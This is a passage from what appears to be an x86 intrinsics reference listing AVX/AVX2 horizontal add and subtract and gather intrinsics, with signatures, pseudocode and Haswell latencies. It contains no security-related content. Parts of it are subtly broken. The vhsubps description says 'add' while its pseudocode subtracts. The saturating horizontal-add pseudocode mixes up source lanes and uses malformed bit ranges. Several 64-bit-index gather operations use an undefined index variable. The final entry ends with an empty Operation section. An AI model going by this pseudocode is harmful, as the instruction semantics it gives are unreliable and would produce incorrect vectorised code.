dst[31:0] := a[63:32] + a[31:0] dst[63:32] := a[127:96] + a[95:64] dst[95:64] := b[63:32] + b[31:0] dst[127:96] := b[127:96] + b[95:64] dst[159:128] := a[191:160] + a[159:128] dst[191:160] := a[255:224] + a[223:192] dst[223:192] := b[191:160] + b[159:128] dst[255:224] := b[255:224] + b[223:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
vphaddsw
__m256i _mm256_hadds_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hadds_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphaddsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally add adjacent pairs of 16-bit integers in a and b using saturation, and pack the signed 16-bit results in dst.

Operation

dst[15:0]= Saturate_To_Int16(a[31:16] + a[15:0]) dst[31:16] = Saturate_To_Int16(a[63:48] + a[47:32]) dst[47:32] = Saturate_To_Int16(a[95:80] + a[79:64]) dst[63:48] = Saturate_To_Int16(a[127:112] + a[111:96]) dst[79:64] = Saturate_To_Int16(b[31:16] + b[15:0]) dst[95:80] = Saturate_To_Int16(b[63:48] + b[47:32]) dst[111:96] = Saturate_To_Int16(b[95:80] + b[79:64]) dst[127:112] = Saturate_To_Int16(b[127:112] + b[111:96]) dst[143:128] = Saturate_To_Int16(a[159:144] + a[143:128]) dst[159:144] = Saturate_To_Int16(a[191:176] + a[175:160]) dst[175:160] = Saturate_To_Int16( a[223:208] + a[207:192]) dst[191:176] = Saturate_To_Int16(a[255:240] + a[239:224]) dst[207:192] = Saturate_To_Int16(b[127:112] + b[143:128]) dst[223:208] = Saturate_To_Int16(b[159:144] + b[175:160]) dst[239:224] = Saturate_To_Int16(b[191-160] + b[159-128]) dst[255:240] = Saturate_To_Int16(b[255:240] + b[239:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 2
vphsubw
__m256i _mm256_hsub_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hsub_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphsubw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally subtract adjacent pairs of 16-bit integers in a and b, and pack the signed 16-bit results in dst.

Operation

dst[15:0] := a[15:0] — a[31:16] dst[31:16] := a[47:32] — a[63:48] dst[47:32] := a[79:64] — a[95:80] dst[63:48] := a[111:96] — a[127:112] dst[79:64] := b[15:0] — b[31:16] dst[95:80] := b[47:32] — b[63:48] dst[111:96] := b[79:64] — b[95:80] dst[127:112] := b[111:96] — b[127:112] dst[143:128] := a[143:128] — a[159:144] dst[159:144] := a[175:160] — a[191:176] dst[175:160] := a[207:192] — a[223:208] dst[191:176] := a[239:224] — a[255:240] dst[207:192] := b[143:128] — b[159:144] dst[223:208] := b[175:160] — b[191:176] dst[239:224] := b[207:192] — b[223:208] dst[255:240] := b[239:224] — b[255:240] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vphsubd
__m256i _mm256_hsub_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hsub_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphsubd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally subtract adjacent pairs of 32-bit integers in a and b, and pack the signed 32-bit results in dst.

Operation

dst[31:0] := a[31:0] — a[63:32] dst[63:32] := a[95:64] — a[127:96] dst[95:64] := b[31:0] — b[63:32] dst[127:96] := b[95:64] — b[127:96] dst[159:128] := a[159:128] — a[191:160] dst[191:160] := a[223:192] — a[255:224] dst[223:192] := b[159:128] — b[191:160] dst[255:224] := b[223:192] — b[255:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vhsubpd
__m256d _mm256_hsub_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_hsub_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vhsubpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally subtract adjacent pairs of double-precision (64-bit) floating-point elements in a and b, and pack the results in dst.

Operation

dst[63:0] := a[63:0] — a[127:64] dst[127:64] := b[63:0] — b[127:64] dst[191:128] := a[191:128] — a[255:192] dst[255:192] := b[191:128] — b[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
vhsubps
__m256 _mm256_hsub_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_hsub_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vhsubps ymm, ymm, ymm
CPUID Flags: AVX

Description

Horizontally add adjacent pairs of single-precision (32-bit) floating-point elements in a and b, and pack the results in dst.

Operation

dst[31:0] := a[31:0] — a[63:32] dst[63:32] := a[95:64] — a[127:96] dst[95:64] := b[31:0] — b[63:32] dst[127:96] := b[95:64] — b[127:96] dst[159:128] := a[159:128] — a[191:160] dst[191:160] := a[223:192] — a[255:224] dst[223:192] := b[159:128] — b[191:160] dst[255:224] := b[223:192] — b[255:224] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5
Ivy Bridge 5
Sandy Bridge 5
vphsubsw
__m256i _mm256_hsubs_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_hsubs_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vphsubsw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Horizontally subtract adjacent pairs of 16-bit integers in a and b using saturation, and pack the signed 16-bit results in dst.

Operation

dst[15:0]= Saturate_To_Int16(a[15:0] — a[31:16]) dst[31:16] = Saturate_To_Int16(a[47:32] — a[63:48]) dst[47:32] = Saturate_To_Int16(a[79:64] — a[95:80]) dst[63:48] = Saturate_To_Int16(a[111:96] — a[127:112]) dst[79:64] = Saturate_To_Int16(b[15:0] — b[31:16]) dst[95:80] = Saturate_To_Int16(b[47:32] — b[63:48]) dst[111:96] = Saturate_To_Int16(b[79:64] — b[95:80]) dst[127:112] = Saturate_To_Int16(b[111:96] — b[127:112]) dst[143:128]= Saturate_To_Int16(a[143:128] — a[159:144]) dst[159:144] = Saturate_To_Int16(a[175:160] — a[191:176]) dst[175:160] = Saturate_To_Int16(a[207:192] — a[223:208]) dst[191:176] = Saturate_To_Int16(a[239:224] — a[255:240]) dst[207:192] = Saturate_To_Int16(b[143:128] — b[159:144]) dst[223:208] = Saturate_To_Int16(b[175:160] — b[191:176]) dst[239:224] = Saturate_To_Int16(b[207:192] — b[223:208]) dst[255:240] = Saturate_To_Int16(b[239:224] — b[255:240]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpgatherdd
__m128i _mm_i32gather_epi32 (int const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i32gather_epi32 (int const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdd
__m128i _mm_mask_i32gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128imask, const int scale)

Synopsis

__m128i _mm_mask_i32gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdd
__m256i _mm256_i32gather_epi32 (int const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256i _mm256_i32gather_epi32 (int const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdd
__m256i _mm256_mask_i32gather_epi32 (__m256i src, int const* base_addr, __m256i vindex, __m256imask, const int scale)

Synopsis

__m256i _mm256_mask_i32gather_epi32 (__m256i src, int const* base_addr, __m256i vindex, __m256i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m128i _mm_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m128i _mm_mask_i32gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128imask, const int scale)

Synopsis

__m128i _mm_mask_i32gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m256i _mm256_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)

Synopsis

__m256i _mm256_i32gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherdq
__m256i _mm256_mask_i32gather_epi64 (__m256i src, __int64 const* base_addr, __m128i vindex, __m256i mask, const int scale)

Synopsis

__m256i _mm256_mask_i32gather_epi64 (__m256i src, __int64 const* base_addr, __m128i vindex, __m256i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherdq ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m128d _mm_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128d _mm_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m128d _mm_mask_i32gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128dmask, const int scale)

Synopsis

__m128d _mm_mask_i32gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m256d _mm256_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)

Synopsis

__m256d _mm256_i32gather_pd (double const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdpd
__m256d _mm256_mask_i32gather_pd (__m256d src, double const* base_addr, __m128i vindex, __m256dmask, const int scale)

Synopsis

__m256d _mm256_mask_i32gather_pd (__m256d src, double const* base_addr, __m128i vindex, __m256d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdpd ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 32-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 m := j*32 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+31:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdps
__m128 _mm_i32gather_ps (float const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128 _mm_i32gather_ps (float const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdps xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdps
__m128 _mm_mask_i32gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)

Synopsis

__m128 _mm_mask_i32gather_ps (__m128 src, float const* base_addr, __m128i vindex, __m128 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdps xmm, vm32x, xmm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdps
__m256 _mm256_i32gather_ps (float const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256 _mm256_i32gather_ps (float const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherdps ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherdps
__m256 _mm256_mask_i32gather_ps (__m256 src, float const* base_addr, __m256i vindex, __m256mask, const int scale)

Synopsis

__m256 _mm256_mask_i32gather_ps (__m256 src, float const* base_addr, __m256i vindex, __m256 mask, const int scale)
#include «immintrin.h»
Instruction: vgatherdps ymm, vm32x, ymm
CPUID Flags: AVX2

Description

Gather single-precision (32-bit) floating-point elements from memory using 32-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 32-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[i+31:i])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqd
__m128i _mm_i64gather_epi32 (int const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i64gather_epi32 (int const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqd
__m128i _mm_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128imask, const int scale)

Synopsis

__m128i _mm_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:64] := 0 dst[MAX:64] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqd
__m128i _mm256_i64gather_epi32 (int const* base_addr, __m256i vindex, const int scale)

Synopsis

__m128i _mm256_i64gather_epi32 (int const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:128] := 0
vpgatherqd
__m128i _mm256_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m256i vindex, __m128imask, const int scale)

Synopsis

__m128i _mm256_mask_i64gather_epi32 (__m128i src, int const* base_addr, __m256i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 32-bit integers from memory using 64-bit indices. 32-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 IF mask[i+31] dst[i+31:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+31] := 0 ELSE dst[i+31:i] := src[i+31:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0
vpgatherqq
__m128i _mm_i64gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128i _mm_i64gather_epi64 (__int64 const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqq
__m128i _mm_mask_i64gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128imask, const int scale)

Synopsis

__m128i _mm_mask_i64gather_epi64 (__m128i src, __int64 const* base_addr, __m128i vindex, __m128i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqq
__m256i _mm256_i64gather_epi64 (__int64 const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256i _mm256_i64gather_epi64 (__int64 const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vpgatherqq
__m256i _mm256_mask_i64gather_epi64 (__m256i src, __int64 const* base_addr, __m256i vindex, __m256i mask, const int scale)

Synopsis

__m256i _mm256_mask_i64gather_epi64 (__m256i src, __int64 const* base_addr, __m256i vindex, __m256i mask, const int scale)
#include «immintrin.h»
Instruction: vpgatherqq ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather 64-bit integers from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from srcwhen the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:256] := 0 dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m128d _mm_i64gather_pd (double const* base_addr, __m128i vindex, const int scale)

Synopsis

__m128d _mm_i64gather_pd (double const* base_addr, __m128i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m128d _mm_mask_i64gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128dmask, const int scale)

Synopsis

__m128d _mm_mask_i64gather_pd (__m128d src, double const* base_addr, __m128i vindex, __m128d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd xmm, vm64x, xmm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

FOR j := 0 to 1 i := j*64 IF mask[i+63] dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] mask[i+63] := 0 ELSE dst[i+63:i] := src[i+63:i] FI ENDFOR mask[MAX:128] := 0 dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m256d _mm256_i64gather_pd (double const* base_addr, __m256i vindex, const int scale)

Synopsis

__m256d _mm256_i64gather_pd (double const* base_addr, __m256i vindex, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst. scaleshould be 1, 2, 4 or 8.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := MEM[base_addr + SignExtend(vindex[m+63:m])*scale] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6
vgatherqpd
__m256d _mm256_mask_i64gather_pd (__m256d src, double const* base_addr, __m256i vindex, __m256dmask, const int scale)

Synopsis

__m256d _mm256_mask_i64gather_pd (__m256d src, double const* base_addr, __m256i vindex, __m256d mask, const int scale)
#include «immintrin.h»
Instruction: vgatherqpd ymm, vm64x, ymm
CPUID Flags: AVX2

Description

Gather double-precision (64-bit) floating-point elements from memory using 64-bit indices. 64-bit elements are loaded from addresses starting at base_addr and offset by each 64-bit element in vindex (each index is scaled by the factor in scale). Gathered elements are merged into dst using mask (elements are copied from src when the highest bit is not set in the corresponding element). scale should be 1, 2, 4 or 8.

Operation

